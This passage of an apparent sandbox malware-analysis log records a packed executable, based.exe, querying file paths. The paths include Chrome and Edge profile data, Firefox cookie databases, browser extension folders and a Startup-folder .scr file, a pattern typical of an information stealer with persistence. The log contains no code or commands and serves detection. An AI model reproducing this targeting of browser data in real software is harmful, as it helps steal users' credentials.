                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042 VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\_socket.pyd VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042 VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\select.pyd VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042 VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\_ssl.pyd VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042 VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042 VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\_hashlib.pyd VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042 VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\_queue.pyd VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042 VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042 VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\unicodedata.pyd VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\7-Zip VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\CertificateRevocation VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\CommerceHeuristics VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\attachments VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\reports VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras\AutoItX VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\fccd7e85-a1ff-4466-9ff5-c20d62f6e0a2 VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\CommerceHeuristics VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\attachments VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\reports VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crowd Deny VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\fccd7e85-a1ff-4466-9ff5-c20d62f6e0a2 VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0 VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\af VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\af VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\az VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\bn VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\cs VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\el VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\en VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\en_GB VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\es_419 VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\eu VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\eu VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\fa VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\fr VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\CertificateRevocation VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\attachments VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\fr_CA VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\fccd7e85-a1ff-4466-9ff5-c20d62f6e0a2 VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\hr VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\hu VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\hy VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\id VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\is VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0 VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\af VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\am VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ar VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\bg VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\content-prefs.sqlite VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\lv VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\mn VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ms VolumeInformation
